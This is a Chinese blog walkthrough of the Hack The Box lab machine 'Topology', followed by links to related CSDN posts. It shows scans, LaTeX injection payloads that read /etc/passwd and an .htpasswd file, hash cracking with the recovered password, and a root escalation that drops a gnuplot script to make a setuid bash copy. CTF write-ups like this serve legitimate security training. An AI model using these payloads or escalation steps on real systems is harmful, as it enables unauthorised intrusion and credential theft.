HTB topology

已于 2023-10-04 00:59:19 修改
阅读量107 收藏 1
点赞数
分类专栏: htb 文章标签: 服务器 linux 运维
于 2023-10-03 01:28:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pandasaymmm/article/details/133501481
版权 
上来先nmap扫一下
sudo nmap -sT --min-rate 10000 -p- 10.10.11.217
nmap --script=vuln -p22,80 10.10.11.217


echo "10.10.11.217 topology.htb" >> /etc/hosts


页面没有发现什么东西,目录扫描一下
dirsearch -u http://topology.htb -e * 

[22:47:43] 403 -  277B  - /.htaccess_orig
[22:47:43] 403 -  277B  - /.htpasswds
[22:47:43] 403 -  277B  - /.htaccessOLD2
[22:47:43] 403 -  277B  - /.httr-oauth
[22:47:44] 403 -  277B  - /.htpasswd_test
[22:47:51] 403 -  277B  - /.php
[22:51:22] 301 -  310B  - /css  ->  http://topology.htb/css/
[22:52:40] 301 -  313B  - /images  ->  http://topology.htb/images/
[22:52:40] 200 -    1KB - /images/
[22:52:48] 200 -    7KB - /index.html

也扫不出来什么东西

在这里发现子域名http://latex.topology.htb/

也不存在目录穿越

Refer-HackTrick:Formula/CSV/Doc/LaTeX Injection - HackTricks
Refer-github:https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LaTeX%20Injection
存在laTex表达式注入

啊哈哈哈,第一条poc就被ban了

读取文件
$\lstinputlisting{/etc/passwd}$

$\lstinputlisting{/var/www/dev/.htpasswd}$

用hash-identifier查加密方式。

丢给hashcat

hashcat -m(类型)  

0 = MD5

  10 = md5($pass.$salt)

  20 = md5($salt.$pass)

  30 = md5(unicode($pass).$salt)

  40 = md5($salt.unicode($pass))

  50 = HMAC-MD5 (key = $pass)

  60 = HMAC-MD5 (key = $salt)

  100 = SHA1

  110 = sha1($pass.$salt)

  120 = sha1($salt.$pass)

  130 = sha1(unicode($pass).$salt)

  140 = sha1($salt.unicode($pass))

  150 = HMAC-SHA1 (key = $pass)

  160 = HMAC-SHA1 (key = $salt)

  200 = MySQL323

  300 = MySQL4.1/MySQL5

  400 = phpass, MD5(Wordpress), MD5(phpBB3),MD5(Joomla)

  500 = md5crypt, MD5(Unix), FreeBSD MD5,Cisco-IOS MD5

  900 = MD4

  1000 = NTLM

  1100 = Domain Cached Credentials (DCC), MSCache

  1400 = SHA256

  1410 = sha256($pass.$salt)

  1420 = sha256($salt.$pass)

  1430 = sha256(unicode($pass).$salt)

  1431 = base64(sha256(unicode($pass)))

  1440 = sha256($salt.unicode($pass))

  1450 = HMAC-SHA256 (key = $pass)

  1460 = HMAC-SHA256 (key = $salt)

  1600 = md5apr1, MD5(APR), Apache MD5

  1700 = SHA512

  1710 = sha512($pass.$salt)

  1720 = sha512($salt.$pass)

  1730 = sha512(unicode($pass).$salt)

  1740 = sha512($salt.unicode($pass))

  1750 = HMAC-SHA512 (key = $pass)

  1760 = HMAC-SHA512 (key = $salt)

  1800 = SHA-512(Unix)

  2400 = Cisco-PIX MD5

  2410 = Cisco-ASA MD5

  2500 = WPA/WPA2
 

得到密码:calculus20

ssh登录

拿到user的flag

这里的pspy64,chomd +x跑一下看看是啥(linux查看正在运行的脚本)

可以看到find /opt/gunplot -name *.plt -exec gunplot {}
这条命令 意思就是在/opt/gunplot这个目录下搜索 *.plt的文件
然后作为gunplot的参数执行

-bash-5.0$ echo "system 'cp /bin/bash /tmp/someb0dy;chmod u+s /tmp/someb0dy'">someb0dy.plt
-bash-5.0$ cp someb0dy.plt /opt/gnuplot/someb0dy.plt
-bash-5.0$ ./someb0dy  -p
someb0dy-5.0# whaomi
root

熊猫叫喵喵喵
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HTB Topology WriteUp
qq_58869808的博客
06-12 4954
HTB writeUp
HTB在内核实现
关注云计算,与中国云计算共成长
11-25 2801
Linux内核中流量控制(11) 本文档的Copyleft归yfydz所有,使用GPL发布,可以自由拷贝,转载,转载时请保持文档的完整性, 严禁用于任何商业用途。 msn: yfydz_no1@hotmail.com 来源:http://yfydz.cublog.cn Java代码   5.11 HTB(Hierarchical token bu
分类流控qdisc之htb
九天小哥的专栏
11-06 1784
文章目录tc参数配置示例算法思想用户态实现数据结构htb全局配置参数: tc_htb_globhtb类配置参数: tc_htb_optqdisc配置参数解析: htb_parse_opt()class配置参数解析: htb_parse_copt()内核实现数据结构qdisc操作集私有数据: htb_schedhtb类结构: htb_classqdisc操作集: htb_qdisc_ops初始化: htb_init()qdisc类操作集: htb_class_opschange()回调: htb_change
HTB打靶(Active Directory 101 Forest)
qq_18811919的博客
12-25 1086
HackTheBox Active Directory 101 Forest
HackTheBox系列-Topology
qq_43264813的博客
11-16 77
5、使用浏览器访问后发现latex是一个可正常访问的子域名并且可以遍历目录,其中equation.php是一个latex表达式生成界面,根据内容信息可知输入**\frac{x+5}{y-3}**可输出对应的图片。7、使用payload进行尝试注入读取/etc/passwd文件,发现被防护,使用"$“和”["皆被防护。这条命令,在/opt/gunplot这个目录下搜索 *.plt的文件,然后作为gunplot的参数执行。2、使用浏览器访问80端口发现是一个网页,对其进行信息收集。16、根据资料进行提权。
HTB靶场记录】TIER-0
Madess的博客
04-25 608
HTB靶场好像从21年取消获取邀请码这个小门槛之后就可以直接注册,虽然他是个氪金游戏,但是还是想小摸一把,在经历曲折的注册过程(明白了科学上网的重要性,以及被谷歌的验证码折磨了一轮)... 1.连接靶场的vpn 点击lab打开第一个靶场,点击connect to HTB 选择端口下载并打开文件 刷新显示连接成功 2.Meow 获取靶机IP,kali可以直接ping通靶机IP地址 靶机:10.129.5.209 开始答题(直接配合翻译食用) 第一题:首字母缩写VM代.
在Mininet中使用topology zoo:Graphml转Mininet拓扑
裕东方的博客
04-27 1859
项目地址(内含使用方法) GitHub - yyd19981117/Graphml-To-Mininet (如果本文帮到了忙,能否star一个?) 简介 topology-zoo:The Internet Topology Zoo 收录了世界各地的261个真实网络拓扑结构,用于网络相关研究和实验,尤其适合各种网络仿真,因为计算机网络类论文的仿真实验,如果自己搭建拓扑,太容易被审稿人怼拓扑设置简单、不符合实际等一系列问题。 因此,由于topology zoo的数据集均来源于真实世界,提供了上述
htb
03-11
相关项目。
HTB
02-12
HTB
追溯HTB
02-18
追溯HTB
ros脚本HTB+PCQ
01-05
对于ros来说是一个很好的限速脚本,网页游戏优先,看电影,12兆,20人,不卡,现在看到的是12m的,如果要修改,可以自己修改分配流量
nc网络收发测试-tcp客户端\TCP服务器\UDP\UDP广播
06-14 510
nc网络收发测试-tcp客户端
百度网盘限速解决办法
热门推荐
生活在别处
06-13 1万+
比如可以获取下载直链后,使用IDM(Internet Download Manager)对该直链进行多线程下载,但是并不会有实际速率提升效果,因为百度网盘在服务器端进行了限速,多线程的速率总和被限制在了100KB/s左右。(现在虽然是所谓玩游戏获得会员下载体验,实际上点击后会在百度网盘内打开一个web游戏,并不需要游玩游戏,直接等待会员下载体验时间结束即可关闭web游戏窗口)所以,客户端这些改动伎俩通通没有实际效果,即使在客户端显示无限速、显示会员体验,都只是自欺欺人而已。
服务器远程桌面经常连接不上,造成远程桌面连接不上的原因都有哪些
最新发布
day3ZY的博客
06-15 547
防火墙和安全软件在保护服务器免受恶意攻击的同时,也可能误判正常的远程连接请求,导致连接被阻止。例如,如果远程桌面服务未启用,或者远程桌面端口被占用或配置错误,都可能导致连接失败。此外,如果服务器上安装了安全类软件,且未正确配置以允许远程桌面连接,也可能导致连接问题。例如,服务器可能遭受DDOS攻击,导致流量超出防御峰值,IP被封锁,进而无法远程连接。服务器远程桌面连接不稳定或经常连接不上是一个较为常见的技术问题,其可能的原因涉及多个层面,包括网络设置、服务器配置、系统安全等方面。
DELL服务器插入新磁盘、创建虚拟磁盘、挂载磁盘步骤
Clang’s Blog
06-15 926
分区磁盘 sudo fdisk /dev/sdb # 格式化分区 sudo mkfs.ext4 /dev/sdb1 # 创建挂载点 sudo mkdir /mnt/newdisk # 挂载分区 sudo mount /dev/sdb1 /mnt/newdisk # 编辑 fstab 以实现持久挂载 sudo nano /etc/fstab这样就可以将新磁盘(sdb)挂载到,并且每次重启后它都会自动挂载在那里。
多进程并发服务器
dc爱傲雪和技术
06-12 308
3.子进程:完成通信,接受一个客户端连接,就创建一个子进程用于通信。要实现TCP通信服务器处理并发的任务,使用多线程或者多进程来解决。2.父进程负责等待并接受客户端的连接。
服务器权限管理
2302_80643218的博客
06-15 657
我们linux服务器上有严格的权限等级,如果权限过高导致误操作会增加服务器的风险。所以对于了解linux系统中的各种权限及要给用户,服务等分配合理的权限十分重要。(权限越大,责任越大)
Linux 常用命令 - userdel 【删除用户】
随便转转
06-12 195
userdel 这个命令源自于 “user delete”,即用户删除。这个命令主要用于在 Linux 系统中删除用户账户及其相关文件。当管理员需要移除一个用户及其在系统中的所有踪迹时,会用到这个命令。
format htb
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值